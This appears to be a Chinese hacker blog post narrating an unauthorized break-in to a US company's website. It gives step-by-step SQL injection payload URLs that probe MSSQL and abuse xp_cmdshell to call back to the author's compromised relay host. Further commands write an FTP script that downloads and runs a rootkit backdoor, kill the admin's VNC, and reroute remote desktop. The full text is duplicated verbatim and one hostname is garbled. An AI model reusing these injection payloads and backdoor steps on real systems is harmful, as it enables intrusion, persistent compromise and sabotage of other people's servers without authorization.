一次通过注入渗透USA网站过程
作者:rover[play8.net]
这几天看了好多注入方面的文章,看的俺是热血沸腾啊~准备找个站注入看看~中国的俺不干~也不是爱国~是经不起人骂~~~~
注入的最基本要求是找一个注入点的~去哪找那么多的注入点呢~俺想到了google
搜了一个很经典的注入点后缀.asp?ID=8,选的是”搜索所有网页”,.哈,一大片英文叶子
挨个点上手工测试~
http://xxx.com/list.asp?id=8’
如果过滤了单引号就返回示正常页面~
经过俺找了好多的网站,终于找到一个传说中的注入点
http://www.sssd.com/program_detail.asp?id=8'
Error Type:
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the character string ''.
好~说明很有可能注入~而且是mssql,俺喜欢
再测试
http://www.sssd.com/program_detail.asp?id=8 and 0<>(select @@version)—
这个是返回对方系统的版本和sql版本的
返回
Error Type:
Microsoft OLE DB Provider for ODBC Drivers (0x80040E07)
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'Microsoft SQL Server 2000 - 8.00.760 (Intel X86) Dec 17 2002 14:22:05 Copyright (c) 1988-2003 Microsoft Corporation Standard Edition on Windows NT 5.0 (Build 2195: Service Pack 4) ' to a column of data type int.
/program_detail.asp, line 15
恩,是nt5.0+sp4的,也凑合~美国那么牛查咱就不挑剔什么了
再看看网页上用的sql帐户是不是DBO权限的,如果是咱们有可能利用xp_cmdshell执行系统命令的
http://www.sssd.com/program_detail.asp?id=8 and user_name()='dbo'
返回正常页面~hoho~~说明对方用的就是dbo权限的sqlserver帐户
接下来就是得到系统权限了~
按着网络上用烂的方法现在应该是得到web的物理路径然后传webshell了吧~
可是俺用遍了俺看到的方法还是没暴出来远程主机的web路径
找13K要了一段据说是万能的暴路径代码
http://www.sssd.com/program_detail.asp?id=8;create table [dbo].[13k] ([fuck][char](255));--
http://www.sssd.com/program_detail.asp?id=8;DECLARE @result varchar(255) EXEC master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM/ControlSet001/Services/W3SVC/Parameters/Virtual Roots', '/', @result output insert into 13k (fuck) values(@result);--
http://www.sssd.com/program_detail.asp?id=8 and (select top 1 fuck from 13k)=1
这段代码是从注册表读出对方web的路径写到一个表里面,最后通过查询那个表暴出web的路径,可是俺就是压根没成功,到第二句就出错了
既然不行就换方法~看看对方有没有删除xp_cmdshell扩展
在俺肉鸡上监听一个端口99
nc –l –vv –p 99
http://www.sssd.com/program_detail.asp?id=8;exec master.dbo.xp_cmdshell 'telnet 肉鸡IP 99';--
马上我肉鸡上的NC就有反应了,哈哈~,xp_cmdshell还有
http://www.sssd.com/program_detail.asp?id=8;exec master.dbo.xp_cmdshell 'net start tlntsvr';--
打开telnet服务~
返回正常页面~说明咱们的命令很有可能成功了
我telnet www.sssd.com 妈妈的,系统告诉俺不可连接远程主机的23端口
郁闷~看来对方过滤了端口
既然可以执行系统命令,那么把shell底下的那一套用上~哈哈~
先配置好一个后门,我用的是hxdef100(可以穿过防火墙,俺喜欢),配置好然后做了一个自动安装的批处理install.cmd,用winrar做成了自解包,配置自解后自动执行install.cmd安装后门
http://www.sssd.com/program_detail.asp?id=8;exec master.dbo.xp_cmdshell 'echo open ftpserver port >t.t';--
http://www.sssd.com/program_detail.asp?id=8 ;ecex master.dbo.xp_cmdshell’echo user >>c:/t.t’
http://www.sssd.com/program_detail.asp?id=8;exec master.dbo.xp_cmdshell’echo pass >>c:/t.t’
http://www.sssd.com/program_detail.asp?id=8;exec master.dbo.xp_cmdshell’echo get rover.exe >>c:/t.t’
http://www.sssd.com/program_detail.asp?id=8;exec master.dbo.xp_cmdshell’echo bye >>c:/t.t’
写一个FTP的批处理文件进去~哈哈~然后我们执行
http://www.sssd.com/program_detail.asp?id=8;exec master.dbo.xp_cmdshell’ftp –s:t.t’
那个rover.exe就是配置好的后门,都返回正常页面,很有可能下载完成了
再执行后门~
http://www.sssd.com/program_detail.asp?id=8;exec master.dbo.xp_cmdshell’rover.exe’
好的~现在用后门的客户端连接主机80,输入密码,hoho~~~一个shell出现了~~
admin权限的,net start 了一下,发现远程主机开了终端服务的,传上去terninalport.exe(一个查看修改终端服务端口的小东西)发现端口就是3389
telnet www.sssd.com 3389 提示不可连接,NND,过滤了~god~~
当时我猜测是对方主机上防火墙的问题~传上pskill和fport.exe,把可疑的进程杀掉了~再telnet 3389,还是不行~再试~俺看见他主机上装着winvnc控制软件,就大胆猜测是管理员管理用的,telnet www,naïf.com 5800妈妈的,通了~~管理员真变态~放着好好的终端管理不用,非用VNC,faint~~
pskill winvnc~
杀掉winvnc的进程,然后删掉winvnc服务的文件~妈妈的,看你还启动的起来~
最后
terninalport 5800
把终端的端口改成5800,重启系统~~
2分钟后俺用终端连接www.sssd.com:5800 成功~hoho~~~
连接进去以后才发现这个主机没有任何防火墙,也没有ispec策略~端口过滤完全在路由上实现的,NND
本文没什么技术性的东西~只是一个思路而起~希望对你有用
作者:rover[play8.net]
这几天看了好多注入方面的文章,看的俺是热血沸腾啊~准备找个站注入看看~中国的俺不干~也不是爱国~是经不起人骂~~~~
注入的最基本要求是找一个注入点的~去哪找那么多的注入点呢~俺想到了google
搜了一个很经典的注入点后缀.asp?ID=8,选的是”搜索所有网页”,.哈,一大片英文叶子
挨个点上手工测试~
http://xxx.com/list.asp?id=8’
如果过滤了单引号就返回示正常页面~
经过俺找了好多的网站,终于找到一个传说中的注入点
http://www.sssd.com/program_detail.asp?id=8'
Error Type:
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the character string ''.
好~说明很有可能注入~而且是mssql,俺喜欢
再测试
http://www.sssd.com/program_detail.asp?id=8 and 0<>(select @@version)—
这个是返回对方系统的版本和sql版本的
返回
Error Type:
Microsoft OLE DB Provider for ODBC Drivers (0x80040E07)
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'Microsoft SQL Server 2000 - 8.00.760 (Intel X86) Dec 17 2002 14:22:05 Copyright (c) 1988-2003 Microsoft Corporation Standard Edition on Windows NT 5.0 (Build 2195: Service Pack 4) ' to a column of data type int.
/program_detail.asp, line 15
恩,是nt5.0+sp4的,也凑合~美国那么牛查咱就不挑剔什么了
再看看网页上用的sql帐户是不是DBO权限的,如果是咱们有可能利用xp_cmdshell执行系统命令的
http://www.sssd.com/program_detail.asp?id=8 and user_name()='dbo'
返回正常页面~hoho~~说明对方用的就是dbo权限的sqlserver帐户
接下来就是得到系统权限了~
按着网络上用烂的方法现在应该是得到web的物理路径然后传webshell了吧~
可是俺用遍了俺看到的方法还是没暴出来远程主机的web路径
找13K要了一段据说是万能的暴路径代码
http://www.sssd.com/program_detail.asp?id=8;create table [dbo].[13k] ([fuck][char](255));--
http://www.sssd.com/program_detail.asp?id=8;DECLARE @result varchar(255) EXEC master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM/ControlSet001/Services/W3SVC/Parameters/Virtual Roots', '/', @result output insert into 13k (fuck) values(@result);--
http://www.sssd.com/program_detail.asp?id=8 and (select top 1 fuck from 13k)=1
这段代码是从注册表读出对方web的路径写到一个表里面,最后通过查询那个表暴出web的路径,可是俺就是压根没成功,到第二句就出错了
既然不行就换方法~看看对方有没有删除xp_cmdshell扩展
在俺肉鸡上监听一个端口99
nc –l –vv –p 99
http://www.sssd.com/program_detail.asp?id=8;exec master.dbo.xp_cmdshell 'telnet 肉鸡IP 99';--
马上我肉鸡上的NC就有反应了,哈哈~,xp_cmdshell还有
http://www.sssd.com/program_detail.asp?id=8;exec master.dbo.xp_cmdshell 'net start tlntsvr';--
打开telnet服务~
返回正常页面~说明咱们的命令很有可能成功了
我telnet www.sssd.com 妈妈的,系统告诉俺不可连接远程主机的23端口
郁闷~看来对方过滤了端口
既然可以执行系统命令,那么把shell底下的那一套用上~哈哈~
先配置好一个后门,我用的是hxdef100(可以穿过防火墙,俺喜欢),配置好然后做了一个自动安装的批处理install.cmd,用winrar做成了自解包,配置自解后自动执行install.cmd安装后门
http://www.sssd.com/program_detail.asp?id=8;exec master.dbo.xp_cmdshell 'echo open ftpserver port >t.t';--
http://www.sssd.com/program_detail.asp?id=8 ;ecex master.dbo.xp_cmdshell’echo user >>c:/t.t’
http://www.sssd.com/program_detail.asp?id=8;exec master.dbo.xp_cmdshell’echo pass >>c:/t.t’
http://www.sssd.com/program_detail.asp?id=8;exec master.dbo.xp_cmdshell’echo get rover.exe >>c:/t.t’
http://www.sssd.com/program_detail.asp?id=8;exec master.dbo.xp_cmdshell’echo bye >>c:/t.t’
写一个FTP的批处理文件进去~哈哈~然后我们执行
http://www.sssd.com/program_detail.asp?id=8;exec master.dbo.xp_cmdshell’ftp –s:t.t’
那个rover.exe就是配置好的后门,都返回正常页面,很有可能下载完成了
再执行后门~
http://www.sssd.com/program_detail.asp?id=8;exec master.dbo.xp_cmdshell’rover.exe’
好的~现在用后门的客户端连接主机80,输入密码,hoho~~~一个shell出现了~~
admin权限的,net start 了一下,发现远程主机开了终端服务的,传上去terninalport.exe(一个查看修改终端服务端口的小东西)发现端口就是3389
telnet www.sssd.com 3389 提示不可连接,NND,过滤了~god~~
当时我猜测是对方主机上防火墙的问题~传上pskill和fport.exe,把可疑的进程杀掉了~再telnet 3389,还是不行~再试~俺看见他主机上装着winvnc控制软件,就大胆猜测是管理员管理用的,telnet www,naïf.com 5800妈妈的,通了~~管理员真变态~放着好好的终端管理不用,非用VNC,faint~~
pskill winvnc~
杀掉winvnc的进程,然后删掉winvnc服务的文件~妈妈的,看你还启动的起来~
最后
terninalport 5800
把终端的端口改成5800,重启系统~~
2分钟后俺用终端连接www.sssd.com:5800 成功~hoho~~~
连接进去以后才发现这个主机没有任何防火墙,也没有ispec策略~端口过滤完全在路由上实现的,NND
本文没什么技术性的东西~只是一个思路而起~希望对你有用